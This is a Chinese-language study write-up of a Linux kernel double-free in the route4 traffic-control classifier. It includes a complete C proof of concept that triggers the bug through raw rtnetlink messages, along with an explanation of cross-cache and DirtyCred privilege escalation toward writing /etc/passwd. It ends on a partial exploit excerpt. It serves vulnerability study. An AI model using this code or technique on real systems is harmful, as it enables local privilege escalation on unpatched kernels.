在tcf_proto_create()中会根据name即kind调用函数tcf_proto_lookup_ops()获得对应的ops,内核本来就有一些ops，查找对应ops的原理就是对比kind==ops->kind，如果等于那就返回这个ops的首地址。

比如如果传入的kind="route"就会返回这样的ops

/* Operations table of the "route" classifier; selected when kind == "route". */
static struct tcf_proto_ops cls_route4_ops __read_mostly = {
	.kind		=	"route",
	.classify	=	route4_classify,
	.init		=	route4_init,
	.destroy	=	route4_destroy,
	.get		=	route4_get,
	.change		=	route4_change,
	.delete		=	route4_delete,
	.walk		=	route4_walk,
	.dump		=	route4_dump,
	.bind_class	=	route4_bind_class,
	.owner		=	THIS_MODULE,
};

然后初始化tp的一些字段。

最后调用tp->ops->init即route4_init函数，这个函数创建了一个route4_head结构体用于存放过滤器对应的哈希表

/*
 * init callback of the "route" classifier: allocate a zeroed route4_head and
 * publish it as tp->root.
 *
 * Returns 0 on success, -ENOBUFS if the allocation fails.
 */
static int route4_init(struct tcf_proto *tp)
{
	struct route4_head *head;

	head = kzalloc(sizeof(struct route4_head), GFP_KERNEL);
	if (head == NULL)
		return -ENOBUFS;

	rcu_assign_pointer(tp->root, head);
	return 0;
}

/* Root object of one "route" classifier instance (stored in tp->root). */
struct route4_head {
	struct route4_fastmap		fastmap[16];
	struct route4_bucket __rcu	*table[256 + 1];	/* buckets, indexed by to_hash(handle) in route4_change() */
	struct rcu_head			rcu;
};

然后返回到tc_new_tfilter函数中，把新创建并且初始化的tp插入到chain中

tp = tcf_chain_tp_insert_unique(chain, tp_new, protocol, prio,
						rtnl_held);
		if (IS_ERR(tp)) {
			err = PTR_ERR(tp);
			goto errout_tp;
		}
	} else {
		mutex_unlock(&chain->filter_chain_lock);
	}

然后调用tp->ops->get即route4_get()

根据handle从route4_head链表中获取对应的route4_filter。如果为空且设置了n->nlmsg_flags & NLM_F_CREATE，或者不为空且没有设置n->nlmsg_flags & NLM_F_EXCL，则调用tp->ops->change即route4_change()来创建（或替换）过滤器

err = tp->ops->change(net, skb, tp, cl, t->tcm_handle, tca, &fh,
			      flags, extack);
	if (err == 0) {
		tfilter_notify(net, skb, n, tp, block, q, parent, fh,
			       RTM_NEWTFILTER, false, rtnl_held);
		tfilter_put(tp, fh);
		/* q pointer is NULL for shared blocks */
		if (q)
			q->flags &= ~TCQ_F_CAN_BYPASS;
	}

而route4_change()就是漏洞产生的函数。

硬着头皮看了半个晚上的代码终于大概搞懂了相关的结构体的关系以及漏洞原因。

首先是有一个结构体chain,这个结构体记录了一个tp的链表，然后tc_new_tfilter()函数根据用户传进来的一些参数确定一个tp如果找不到这个tp那就创建一个新的tp，关键的是还会创建一个新的route4_head,记录在这个新tp的字段里，这个route4_head就是一个哈希桶，主要记录route4_filter结构体，route4_head结构体如下

/* Root object of one "route" classifier instance (stored in tp->root). */
struct route4_head {
	struct route4_fastmap		fastmap[16];
	struct route4_bucket __rcu	*table[256 + 1];	/* buckets, indexed by to_hash(handle) in route4_change() */
	struct rcu_head			rcu;
};
/* One bucket of route4_head.table: an array of singly linked filter chains. */
struct route4_bucket {
	/* 16 FROM buckets + 16 IIF buckets + 1 wildcard bucket */
	struct route4_filter __rcu	*ht[16 + 16 + 1];
	struct rcu_head			rcu;
};

/* One "route" filter; filters in the same ht[] slot are chained through next. */
struct route4_filter {
	struct route4_filter __rcu	*next;	/* next filter in the same ht[] chain */
	u32			id;
	int			iif;

	struct tcf_result	res;
	struct tcf_exts		exts;
	u32			handle;	/* key used for lookup and for choosing the chain */
	struct route4_bucket	*bkt;	/* bucket this filter is linked into */
	struct tcf_proto	*tp;
	struct rcu_work		rwork;	/* deferred release, queued by route4_change() */
};

可以清晰的看见就是一个哈希桶，tp->ops->get()是会根据用户传入的handle找对应route4_filter，找到的话返回，没找到返回null。

接着调用tp->ops->change()函数，把get()函数找到的旧的过滤器也传入，change首先会把新的过滤器插入到哈希桶即route4_head中，接着判断旧的过滤器fold是否存在，如果存在的话先把它从哈希桶中移出来，然后把它kfree掉。

/*
 * change callback of the "route" classifier: create a new filter or replace
 * the existing one passed in through *arg.
 *
 * A new route4_filter is always allocated. When an old filter (fold) exists,
 * its id/iif/res/handle/tp/bkt are copied first, then route4_set_parms()
 * applies the netlink attributes. The new filter is linked into its bucket
 * chain in ascending handle order, the old one is (conditionally) unlinked
 * and its release is queued.
 *
 * Returns 0 on success (with *arg set to the new filter), -EINVAL for a
 * missing TCA_OPTIONS with a non-zero handle or a handle mismatch, -ENOBUFS
 * on allocation failure, or the error from attribute parsing / set_parms.
 *
 * NOTE(review): this is the vulnerable (pre-fix) version discussed in this
 * article. The unlink step requires fold->handle != 0, but the release step
 * only requires fold != NULL, so an old filter with handle 0 is queued for
 * freeing while still linked in the bucket chain.
 */
static int route4_change(struct net *net, struct sk_buff *in_skb,
			 struct tcf_proto *tp, unsigned long base, u32 handle,
			 struct nlattr **tca, void **arg, u32 flags,
			 struct netlink_ext_ack *extack)
{
	struct route4_head *head = rtnl_dereference(tp->root);
	struct route4_filter __rcu **fp;
	struct route4_filter *fold, *f1, *pfp, *f = NULL;
	struct route4_bucket *b;
	struct nlattr *opt = tca[TCA_OPTIONS];
	struct nlattr *tb[TCA_ROUTE4_MAX + 1];
	unsigned int h, th;
	int err;
	bool new = true;

	if (opt == NULL)
		return handle ? -EINVAL : 0;

	err = nla_parse_nested_deprecated(tb, TCA_ROUTE4_MAX, opt,
					  route4_policy, NULL);
	if (err < 0)
		return err;

	/* fold is the existing filter found by the caller, or NULL. */
	fold = *arg;
	if (fold && handle && fold->handle != handle)
			return -EINVAL;

	err = -ENOBUFS;
	f = kzalloc(sizeof(struct route4_filter), GFP_KERNEL);
	if (!f)
		goto errout;

	err = tcf_exts_init(&f->exts, net, TCA_ROUTE4_ACT, TCA_ROUTE4_POLICE);
	if (err < 0)
		goto errout;

	/* Replacing: start from the old filter's identity. */
	if (fold) {
		f->id = fold->id;
		f->iif = fold->iif;
		f->res = fold->res;
		f->handle = fold->handle;

		f->tp = fold->tp;
		f->bkt = fold->bkt;
		new = false;
	}

	err = route4_set_parms(net, tp, base, f, handle, head, tb,
			       tca[TCA_RATE], new, flags, extack);
	if (err < 0)
		goto errout;

	/* Find the insertion point that keeps the chain sorted by handle. */
	h = from_hash(f->handle >> 16);
	fp = &f->bkt->ht[h];
	for (pfp = rtnl_dereference(*fp);
	     (f1 = rtnl_dereference(*fp)) != NULL;
	     fp = &f1->next)
		if (f->handle < f1->handle)
			break;

	tcf_block_netif_keep_dst(tp->chain->block);
	rcu_assign_pointer(f->next, f1);
	rcu_assign_pointer(*fp, f);

	/* Unlink the old filter -- skipped entirely when fold->handle is 0. */
	if (fold && fold->handle && f->handle != fold->handle) {
		th = to_hash(fold->handle);
		h = from_hash(fold->handle >> 16);
		b = rtnl_dereference(head->table[th]);
		if (b) {
			fp = &b->ht[h];
			for (pfp = rtnl_dereference(*fp); pfp;
			     fp = &pfp->next, pfp = rtnl_dereference(*fp)) {
				if (pfp == fold) {
					rcu_assign_pointer(*fp, fold->next);
					break;
				}
			}
		}
	}

	route4_reset_fastmap(head);
	*arg = f;
	/* Release the old filter -- done whenever fold exists, unlinked or not. */
	if (fold) {
		tcf_unbind_filter(tp, &fold->res);
		tcf_exts_get_net(&fold->exts);
		tcf_queue_work(&fold->rwork, route4_delete_filter_work);
	}
	return 0;

errout:
	if (f)
		tcf_exts_destroy(&f->exts);
	kfree(f);
	return err;
}

漏洞原理

关键问题就出在route4_change中把旧的过滤器（即struct route4_filter结构体）从哈希桶中移出来然后kfree掉的这段逻辑。看关键代码，首先使用if判断这个fold是否存在以及它的handle是否非0，还要满足f->handle != fold->handle才会进入循环把它从哈希桶中脱链；如果条件不满足就直接进入下一个判断，而这个判断只检查fold是否存在，只要存在就认为旧的过滤器存在，然后把它kfree掉。

可见由于脱链时判断旧过滤器是否存在和kfree时判断旧过滤器是否存在的判断依据不一样，这就会导致歧义的出现。假设这样一种情况，旧过滤器的handle为0，就会导致这个旧的过滤器不会被脱链但是会被kfree。这就可以造成doublefree.

if (fold && fold->handle && f->handle != fold->handle) {
		th = to_hash(fold->handle);
		h = from_hash(fold->handle >> 16);
		b = rtnl_dereference(head->table[th]);
		if (b) {
			fp = &b->ht[h];
			for (pfp = rtnl_dereference(*fp); pfp;
			     fp = &pfp->next, pfp = rtnl_dereference(*fp)) {
				if (pfp == fold) {
					rcu_assign_pointer(*fp, fold->next);
					break;
				}
			}
		}
	}

	route4_reset_fastmap(head);
	*arg = f;
	if (fold) {
		tcf_unbind_filter(tp, &fold->res);
		tcf_exts_get_net(&fold->exts);
		tcf_queue_work(&fold->rwork, route4_delete_filter_work);
	}

漏洞复现

环境搭建

首先是得把漏洞模块编译进入内核，其次还要勾上几个编译选项,这些编译选项最好不要直接在.config中进行修改，因为有些编译选项依赖于其他的编译选项，所以最好是在make menuconfig中进行修改，想要查找某一个编译选项在什么位置可以使用menuconfig的快捷键/进行搜索。

CONFIG_BINFMT_MISC=y
CONFIG_USER_NS=y
CONFIG_NET_CLS_ROUTE4=y
CONFIG_DUMMY=y
CONFIG_NET_SCH_QFQ=y
CONFIG_NET_CLS_ACT=y
CONFIG_NET_CLS_BASIC=y
CONFIG_NET_SCH_SFQ=y
CONFIG_NET_EMATCH_META=y
CONFIG_E1000=y
CONFIG_E1000E=y

poc学习

poc如下

#define _GNU_SOURCE
#include <sched.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/wait.h>
#include <stdlib.h>
#include <string.h>
#include <linux/pkt_sched.h>

#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <stdlib.h>
/*
 * Dump `size` bytes starting at `data` to file descriptor 2 as a classic hex
 * listing: 16 bytes per row, an extra gap after every 8 bytes, followed by a
 * printable-ASCII column ('.' for non-printable bytes). A partial final row is
 * padded so the ASCII column stays aligned.
 */
void hexdump(const void *data, size_t size)
{
    const unsigned char *bytes = data;
    char text[17];
    size_t pos;

    text[16] = '\0';
    for (pos = 0; pos < size; ++pos)
    {
        const unsigned char c = bytes[pos];
        const size_t done = pos + 1;     /* bytes emitted so far */
        const size_t col = done % 16;    /* position inside the current row */
        const int last = (done == size); /* is this the final byte? */
        size_t pad;

        dprintf(2, "%02X ", c);
        text[pos % 16] = (c >= ' ' && c <= '~') ? (char)c : '.';

        /* Nothing more to print unless we hit an 8-byte boundary or the end. */
        if (done % 8 != 0 && !last)
        {
            continue;
        }

        dprintf(2, " ");
        if (col == 0)
        {
            /* Full row: emit the ASCII column. */
            dprintf(2, "|  %s \n", text);
            continue;
        }
        if (!last)
        {
            continue;
        }

        /* Partial final row: terminate the text and pad the hex area. */
        text[col] = '\0';
        if (col <= 8)
        {
            dprintf(2, " ");
        }
        for (pad = col; pad < 16; ++pad)
        {
            dprintf(2, "   ");
        }
        dprintf(2, "|  %s \n", text);
    }
}


/*
 * Pre-built RTM_NEWLINK request (56 bytes): netlink header, interface-info
 * header with ifindex 0x30, a name attribute "et2" and a nested attribute
 * carrying the kind string "dummy". Multi-byte fields are laid out low byte
 * first.
 */
static char newlink[] = {
        /* len */
        56, 0x00, 0x00, 0x00,
        /* type = NEWLINK */
        16, 0x00,
        /* flags = NLM_F_REQUEST | NLM_F_CREATE */
        0x01, 0x04,
        /* seq */
        0x01, 0x00, 0x00, 0x00,
        /* pid */
        0x00, 0x00, 0x00, 0x00,
        /* ifi_family */
        0x00, 0x00, 0x00, 0x00,
        /* ifi_ifindex */
        0x30, 0x00, 0x00, 0x00,
        /* ifi_flags */
        0x00, 0x00, 0x00, 0x00,
        /* ifi_change */
        0x00, 0x00, 0x00, 0x00,
        /* nla_len, nla_type */
        0x08, 0x00, 0x03, 0x00,
        /* string */
        'e', 't', '2', 0,
        /* nla_len, nla_type */
        16, 0x00, 18, 0x00,
        /* nested nla_len, nla_type */
        10, 0x00, 0x01, 0x00,
        'd', 'u', 'm', 'm',
        'y', 0x00, 0x00, 0x00,
};

/*
 * Pre-built RTM_DELLINK request (40 bytes) that names the interface "et2"
 * through a name attribute; ifi_ifindex is left at 0.
 */
static char dellink[] = {
        /* len */
        40, 0x00, 0x00, 0x00,
        /* type = DELLINK */
        17, 0x00,
        /* flags = NLM_F_REQUEST | NLM_F_CREATE */
        0x01, 0x04,
        /* seq */
        0x01, 0x00, 0x00, 0x00,
        /* pid */
        0x00, 0x00, 0x00, 0x00,
        /* ifi_family */
        0x00, 0x00, 0x00, 0x00,
        /* ifi_ifindex */
        0x00, 0x00, 0x00, 0x00,
        /* ifi_flags */
        0x00, 0x00, 0x00, 0x00,
        /* ifi_change */
        0x00, 0x00, 0x00, 0x00,
        /* nla_len, nla_type */
        0x08, 0x00, 0x03, 0x00,
        /* string */
        'e', 't', '2', 0,
};

/*
 * Pre-built RTM_NEWTFILTER request (68 bytes) that creates a "route" filter
 * with tcm_handle 0 on ifindex 0x30: kind attribute "route" plus an OPTIONS
 * attribute holding ROUTE4_TO = 0 and ROUTE4_FROM = 0.
 */
static char tfilter[] = {
        /* len */
        68, 0x00, 0x00, 0x00,
        /* type = NEWTFILTER */
        44, 0x00,
        /* flags = NLM_F_REQUEST | NLM_F_CREATE */
        /* NOTE(review): the bytes encode 0x0441, i.e. bit 0x40 is set in
         * addition to the two flags named above -- confirm this is intended. */
        0x41, 0x04,
        /* seq */
        0x01, 0x00, 0x00, 0x00,
        /* pid */
        0x00, 0x00, 0x00, 0x00,
        /* tcm_family */
        0x00, 0x00, 0x00, 0x00,
        /* tcm_ifindex */
        0x30, 0x00, 0x00, 0x00,
        /* tcm_handle */
        0x00, 0x00, 0x00, 0x00,
        /* tcm_parent */
        0x00, 0x00, 0x01, 0x00,
        /* tcm_info = protocol/prio */
        0x01, 0x00, 0x01, 0x00,
        /* nla_len, nla_type */
        0x0a, 0x00, 0x01, 0x00,
        /* string */
        'r', 'o', 'u', 't',
        'e', 0, 0, 0,
        /* OPTIONS */
        0x14, 0x00, 0x02, 0x00,
        /* ROUTE4_TO */
        0x08, 0x00, 0x02, 0x00,
        0x00, 0x00, 0x00, 0x00,
        /* ROUTE4_FROM */
        0x08, 0x00, 0x03, 0x00,
        0x00, 0x00, 0x00, 0x00,
};

/*
 * Second pre-built RTM_NEWTFILTER request (56 bytes). Same tcmsg header as
 * tfilter (handle 0, same parent and protocol/prio) but without a kind
 * attribute, and with ROUTE4_TO = 1 instead of 0.
 */
static char ntfilter[] = {
        /* len */
        56, 0x00, 0x00, 0x00,
        /* type = NEWTFILTER */
        44, 0x00,
        /* flags = NLM_F_REQUEST | NLM_F_CREATE */
        /* 0x200 = NLM_F_EXCL */
        /* NOTE(review): the bytes encode 0x0441; NLM_F_EXCL (0x200) is not set,
         * and bit 0x40 is set in addition to the flags named above. */
        0x41, 0x04,
        /* seq */
        0x01, 0x00, 0x00, 0x00,
        /* pid */
        0x00, 0x00, 0x00, 0x00,
        /* tcm_family */
        0x00, 0x00, 0x00, 0x00,
        /* tcm_ifindex */
        0x30, 0x00, 0x00, 0x00,
        /* tcm_handle */
        0x00, 0x00, 0x00, 0x00,
        /* tcm_parent */
        0x00, 0x00, 0x01, 0x00,
        /* tcm_info = protocol/prio */
        0x01, 0x00, 0x01, 0x00,
        /* OPTIONS */
        0x14, 0x00, 0x02, 0x00,
        /* ROUTE4_TO */
        0x08, 0x00, 0x02, 0x00,
        0x01, 0x00, 0x00, 0x00,
        /* ROUTE4_FROM */
        0x08, 0x00, 0x03, 0x00,
        0x00, 0x00, 0x00, 0x00,
};


static char linkcmd[] = {
        /* len */
        44, 0x00, 0x00, 0x00,
        /* type = NEWQDISC */
        36, 0x00,
        /* flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_REPLACE */
        0x01, 0x05,
        /* seq */
        0x01, 0x00, 0x00, 0x00,
        /* pid */
        0x00, 0x00, 0x00, 0x00,
        /* tcm_family */
        0x00, 0x00, 0x00, 0x00,
        /* tcm_ifindex */
        0x30, 0x00, 0x00, 0x00,
        /* tcm_handle */
        0x00, 0x00, 0x01, 0x00,
        /* tcm_parent */
        0xff, 0xff, 0xff, 0xff,
        /* tcm_info = protocol/prio */
        0x00, 0x00, 0x00, 0x00,
        /* nla_len, nla_type */
        0x04, 0x00, 0x01, 0x00,
        /* string */
};

int build_qfq(char *buf)
{
        char *qopt;
        short *tlen;
        char *qdisc = "qfq";

        short *optlen;
        short *opttype;

        tlen = buf;

        memset(buf, 0, sizeof(buf));
        memcpy(buf, linkcmd, sizeof(linkcmd));
        strcpy(buf+sizeof(linkcmd), qdisc);
        *tlen = sizeof(linkcmd) + strlen(qdisc) + 1;
        buf[36] = strlen(qdisc)+5;

        qopt = buf + *tlen;
        /* nla_len, nla_type */
        /* 24, 0x00, 0x02, 0x00, */
        optlen = qopt;
        opttype = optlen + 1;
        *opttype = 0x2;

        *optlen = 4;

        *tlen += *optlen;

        return *tlen;
}

/*
 * Send one prepared netlink request on s, read the reply and print it.
 *
 * label      name printed before the hex dump of the request
 * req, len   request bytes and their exact length
 * tag        prefix for the error line ("err" / "Err")
 * show_type  non-zero to also print the reply's nlmsg_type
 *
 * The reply goes into its own buffer, and the error code (offset 16, right
 * after the 16-byte netlink header) and message type (offset 4) are decoded
 * from that buffer.  The original code read the first reply into buf2 but
 * printed values from buf, which still held the outgoing request.
 */
static void nl_step(int s, const char *label, char *req, size_t len,
                    const char *tag, int show_type)
{
        char reply[4096] = {0};
        unsigned short type = 0;
        int err = 0;
        long n;

        printf("%s:\n", label);
        /* Dump exactly the request; 0x100 over-read the small static arrays. */
        hexdump(req, (int)len);

        if (write(s, req, len) < 0) {
                perror("write");
                return;
        }

        /* The socket is non-blocking: no queued reply shows up as an error. */
        n = read(s, reply, sizeof(reply));
        if (n < 0) {
                perror("NLMSG_ERROR");
                return;
        }
        if (n < 20) {
                printf("short reply: %ld bytes\n", n);
                return;
        }

        memcpy(&type, reply + 4, sizeof(type));
        memcpy(&err, reply + 16, sizeof(err));
        printf("%s:%d\n", tag, err);
        if (show_type)
                printf("msg type:%d\n", type);
}

/*
 * PoC driver: enter fresh user and network namespaces, open an rtnetlink
 * socket and send the five prepared requests (newlink, qdisc, tfilter,
 * ntfilter, dellink) one second apart, printing each reply's error code.
 *
 * Returns 0 after all requests were attempted, 1 if the namespaces or the
 * socket could not be set up.
 */
int main(int argc, char **argv)
{
        char qdisc[4096] = {0};
        int tlen;
        int s;

        (void)argc;
        (void)argv;

        /* Without the new namespaces the requests would target the host. */
        if (unshare(CLONE_NEWUSER|CLONE_NEWNET) < 0) {
                perror("unshare");
                return 1;
        }

        tlen = build_qfq(qdisc);

        s = socket(AF_NETLINK, SOCK_RAW|SOCK_NONBLOCK, NETLINK_ROUTE);
        if (s < 0) {
                perror("socket:");
                return 1;
        }
        printf("s: %d\n",s);

        nl_step(s, "newlink", newlink, sizeof(newlink), "err", 1);
        sleep(1);

        nl_step(s, "qdisc", qdisc, (size_t)tlen, "err", 0);
        sleep(1);

        nl_step(s, "tfilter", tfilter, sizeof(tfilter), "err", 0);
        sleep(1);

        nl_step(s, "ntfilter", ntfilter, sizeof(ntfilter), "Err", 0);
        sleep(1);

        nl_step(s, "dellink", dellink, sizeof(dellink), "err", 0);

        return 0;
}

poc写得比较清晰，首先是socket(AF_NETLINK, SOCK_RAW|SOCK_NONBLOCK, NETLINK_ROUTE);，然后发了五次包，第一、第二次好像是设置网络设备的，比较重要的是第三、第四和第五次发包：第三次发包创建了一个handle为0的route4_filter，第四次发包还是传入一个handle为0的route4_filter，这样第一次创建的route4_filter（即第三次发包创建的那个）就被释放，但是没有脱链；然后第五次发包是删除第一次发包创建的link，这样就顺带着把它的route4_filter也给free掉了，于是就构成了一个doublefree。而且不止doublefree了route4_filter，还doublefree了一个指针数组，前一个obj的size为kmalloc-192，后一个是kmalloc-256。

触发了doublefree但是内核并没有直接崩溃。

漏洞利用原理

感觉挺有意思的，也学到了很多东西，漏洞利用主要分为两部分，分别是cross cache attack和dirty cred，下面分别就这两点详细展开学习。

cross cache attack

它的主要作用就是绕过内核的slab隔离。在没有看n1ctf那道内核题目之前，我还不能完全理解这种攻击思路的强大，现在再来看，发现简直太好用了。

内核是从kmem_caches中申请不同大小的obj的，而kmem_caches即kmalloc slab allocation则是基于buddy allocator的，buddy allocator就是伙伴系统，当kmalloc cache上没有足够的obj的时候，就会向buddy allocator申请order-n page，具体会调用 new_slab() -> allocate_slab() -> alloc_slab_page() 向 buddy allocator 申请页。

/*
 * Slab allocation and freeing
 *
 * alloc_slab_page() obtains the pages backing one new slab.  The request
 * order comes from oo via oo_order(); `node` selects between alloc_pages()
 * (when it is NUMA_NO_NODE) and __alloc_pages_node().  Returns the slab
 * view of the allocated folio, or NULL when the allocation fails.
 */
static inline struct slab *alloc_slab_page(gfp_t flags, int node,
        struct kmem_cache_order_objects oo)
{
    struct folio *folio;
    struct slab *slab;
    unsigned int order = oo_order(oo);      // order = kmem_cache->oo.x >> 16

    /* No node preference: take the generic allocation path. */
    if (node == NUMA_NO_NODE)
        folio = (struct folio *)alloc_pages(flags, order);
    else
        folio = (struct folio *)__alloc_pages_node(node, flags, order);

    if (!folio)
        return NULL;

    /* Reinterpret the folio as a slab and mark it as such. */
    slab = folio_slab(folio);
    __folio_set_slab(folio);
    /* Carry the pfmemalloc state of the first page over to the slab. */
    if (page_is_pfmemalloc(folio_page(folio, 0)))
        slab_set_pfmemalloc(slab);

    return slab;
}

其中order-n中的n到底是多少就看这个slab的类型了，可以通过cat /proc/slabinfo快速知道。我查看了自己ubuntu16的cred的slab，输出中的pagesperslab一列为2，也就是说它使用的是伙伴系统中的order-1（2^1个页），一次向伙伴系统直接申请两个连续的页面用于cred的slab。

1
2
3

➜  ~ sudo cat /proc/slabinfo | grep cred
cred_jar            8316   8316    192   42    2 : tunables    0    0    0 : slabdata    198    198      0

buddy allocator 为每个 order-n page 保存着一个 FIFO queue 数组，order-n page 表示 2^n个连续页的内存。当你释放chunk后导致slab全部空闲时，slab allocator 就会将页还给 buddy allocator。
slab对应的order由很多因素决定，如 slab chunk 大小、系统定义、内核编译等，最简单的方法是查看 /proc/slabinfo。
如果所申请的 order-n page 队列为空，则将 order-n+1 的页一分为二，一半返回给申请者，一半保存在 order-n 中；如果1个page返回给 buddy allocator，且其对应的 buddy page 也在同一队列中，则整合后放在下一order的page队列中。

cross cache attack的整体思路是：当一个slab页面中的对象被全部释放时，该页面会被回收，而被回收的页面可以被其他种类的slab使用，这样就可以跨slab种类来进行利用，如Zhenpeng Lin的ppt中演示的：

假定我们有一个非法释放漏洞(或double free)，但只能释放普通slab 中的堆块：

1.首先喷射一堆该大小的普通堆块，这样会消耗一大堆slab 页面。我们的double free目标指针指向其中一个堆块，先将其释放
2.然后将喷射的一大堆普通堆块都释放掉，这样double free目标堆块所在slab 页面中的所有堆块(绝大概率)会被都释放掉，该slab 页面为空，会被系统回收
3.这时喷射一大堆filp / 其他slab 类型的堆块，这样目标指针所在页面大概率会被filp 类型slab或其他目标类型slab重新申请到，并且目标指针(double free漏洞指针)指向其中一个struct file结构体
4.使用漏洞的第二次释放能力，该struct file结构体被非法释放

dirty cred

struct file

很有意思的一个攻击思路。主要的思路就是利用高凭证替换低凭证。而凭证一般就是cred和file,下面主要探讨在doublefree情况下如何进行凭证替换。

file结构体是打开一个文件时就会创建的一个结构体。

/*
 * Kernel object describing an open file (quoted from the kernel source).
 * Per the surrounding write-up, one is created whenever a file is opened,
 * and it is the object targeted by the credential-swapping attack.
 */
struct file {
	union {
		struct llist_node	fu_llist;
		struct rcu_head 	fu_rcuhead;
	} f_u;
	struct path		f_path;
	struct inode		*f_inode;	/* cached value */
	const struct file_operations	*f_op;

	/*
	 * Protects f_ep, f_flags.
	 * Must not be taken from IRQ context.
	 */
	spinlock_t		f_lock;
	enum rw_hint		f_write_hint;
	/* reference count discussed later in the write-up (f_count) */
	atomic_long_t		f_count;
	unsigned int 		f_flags;
	fmode_t			f_mode; // read/write permission
	struct mutex		f_pos_lock;
	loff_t			f_pos;
	struct fown_struct	f_owner;
	/* NOTE(review): presumably the credentials of the opener — confirm */
	const struct cred	*f_cred;
	struct file_ra_state	f_ra;

	u64			f_version;
#ifdef CONFIG_SECURITY
	void			*f_security;
#endif
	/* needed for tty driver, and maybe others */
	void			*private_data;

#ifdef CONFIG_EPOLL
	/* Used by fs/eventpoll.c to link all the hooks to this file */
	struct hlist_head	*f_ep;
#endif /* #ifdef CONFIG_EPOLL */
	struct address_space	*f_mapping;
	errseq_t		f_wb_err;
	errseq_t		f_sb_err; /* for syncfs */
} __randomize_layout
  __attribute__((aligned(4)));	/* lest something weird decides that 2 is OK */

/*
 * Fixed header followed by a variable-length file identifier.
 * NOTE(review): handle_bytes presumably gives the size of f_handle[] in
 * bytes — confirm against the users of this struct.
 */
struct file_handle {
	__u32 handle_bytes;
	int handle_type;
	/* file identifier */
	unsigned char f_handle[];	/* flexible array member; data follows the header */
};

下面是介绍dirty cred的论文中提到的doublefree情况下的利用过程，但我觉得其实没必要这么麻烦，如果只是高凭证替换低凭证的话，假如ptr1拥有doublefree，那先把ptr1给free一次，然后让低凭证申请到这个obj，就记作ptr2，然后再free一次ptr1，就把低凭证也给free掉了，接着再堆喷低凭证，再次申请到ptr2指向的内存，记作ptr3，这样ptr2和ptr3就指向了同一块低凭证struct file了，然后通过系统调用kcmp来得知ptr2和ptr3指向同一个struct file(因为是堆喷)，然后释放低凭证的struct file就能替换成高凭证了。

哦我懂了，下面的方法其实更加通用，因为如果能doublefree的话可能obj的大小不等于struct file的大小，所以可能出现不对齐的现象，所以需要两个ptr指向同一个obj了。上述方法只适用于刚好对齐。

方法：一般 Double-Free 发生在通用cache中，而内核凭证位于 dedicated cache 中，所以这里需要进行 cross-cache 内存布局。内核会回收未使用的内存页，然后分配给其他需要更多空间的cache。

a-d：两次触发DF，获得2个指向同一漏洞对象的悬垂指针（ptr1' / ptr2'）；
e：将该通用cache的内存页全部释放归还给页管理器，这样该内存页就可以分配给 dedicated cache （存放凭证对象）；
f：分配大量凭证对象（特殊cache）占据漏洞对象对应的空闲块，现在有3个指针指向该内存块了（2个悬垂指针和一个victim对象中的凭证指针，悬垂指针可能未对齐，指向凭证对象的内部）；
g：利用其中1个悬垂指针（ptr2'）释放凭证对象，创造空洞；
h：分配新的低权限凭证对象占据该位置；
剩余1个悬垂指针（ptr1'）指向低权限凭证对象，再次释放后就能用高权限凭证对象替换低权限凭证对象了。

到目前为止已经能凭证替换了，现在就得利用凭证替换来完成对不可写文件的写入了。在4.13以前的老版本中，使用writev向某个文件中写入内容时逻辑是这样的

进行访问权限校验(是否可写)
从用户空间获取写入内容
实际写入操作

可以看出在验证完权限和实际写入操作之间还有一步操作，这就可以形成条件竞争了，只要验证完可写权限之后就通过堵塞卡在第二步，然后替换成高凭证。再写入的时候就往不可写文件里写入内容了。

但是这种办法已经是昨日黄花了，在4.13版本以后writev的逻辑就成这样了

从用户空间获取写入内容
进行访问权限校验(是否可写)
实际写入操作

所以在新版本就没办法利用老办法堵塞增大时间窗(从检查权限到真正操作之间的时间)了。但是增大时间窗的办法还是有的，这就利用了文件的inode锁了。

在已经有一个进程对一个文件进行写入操作的时候，会给文件inode上锁，其他向该文件进行写入的进程需要等待上一个进程写入完成解锁。所以就可以有这样的利用了,这样同样可以增大时间窗。

先存在一个进程向一个可写文件写入大量内容，inode锁会锁住较长时间
第二个进程尝试向该文件写入”打算写入/etc/passwd等特权文件的内容”
第三个进程利用漏洞替换file结构体

到这里对struct file的攻击就已经闭环了。

struct cred

对于file类型凭据我们可以使用普通用户可读特权用户可写的/etc/passwd来进行操作，普通用户就可以喷射大量目标用于攻击。但特权的struct cred就没那么容易了。可以通过：

执行大量suid 程序，如sudo(但大部分情况下并没有这个权限)
使用kernel thread，kernel 自己创建的任务是特权任务，我们可以利用一些内核接口控制内核启动一堆kernel thread：

利用workqueue
利用usermode helper

reading exp

终于到了阅读exp的阶段了，距离写下这篇文章的第一行似乎已经过了两周了。。。令人感叹。

进程A，随时准备喷射/etc/passwd文件

if (fork() == 0) {
// 12. Thread 3 - spray 4096*2 priviledged `file` objects to replace unprivileged `file` (wait pipe_file_spray[0])
    adjust_rlimit();
    int spray_num = 0;
    if (read(pipe_file_spray[0][0], &spray_num, sizeof(int)) < sizeof(int))   // use pipe_file_spray to notify
      err(1, "[-] read file spray");

    printf("[12] got cmd, start spraying 4096*2 `file` by opening %s\n", target);
    spray_num = 4096;
    if (fork() == 0) {  // spray 4096 `file` (parent-process)
      for (int i = 0; i < spray_num; i++) {
        pin_on_cpu(i % cpu_cores);
        open(target, 0);
      }
      while (1) {sleep(10000);}
    }

下面是进程B的代码，但是在进程B执行之前得等进程C执行完，进程C就是堆喷一堆struct file来耗尽file slab中的空闲object。进程B就是干了一件事：堆喷很多的route4_filter，然后把它们释放掉，但是它申请的handle都不为0，所以只起了一个耗尽通用slab的obj的作用，等后面全部free的时候就会把对应页交还给伙伴系统了。

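但我其实不是很能理解为什么要设置user namespace。（补充：一个合理的解释是，通过rtnetlink配置qdisc/filter需要CAP_NET_ADMIN权限，普通用户先unshare出新的user namespace和network namespace之后，就能在自己的网络命名空间里拥有该权限。）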

setup_namespace();
      pin_on_cpu(0);
      int sprayfd = socket(PF_NETLINK, SOCK_RAW, 0);
      assert(sprayfd != -1);
      add_qdisc(sprayfd);
// 2-1. prepare payload
      char msg[0x10] = {};
      char payload[256] = {};
      memset(payload + 0x10, 'A', 256 - 0x10);

      if (read(pipe_defrag[0], msg, 2) != 2)
        err(1, "[-] failed read defrag");

  // if the exploit keeps failing, please tune the middle and end
      int middle = 38;       // 38
      int end = middle + 40; // 40
// 2-2. spray (38+3)*32 filters in kmalloc-192 & kmalloc-256
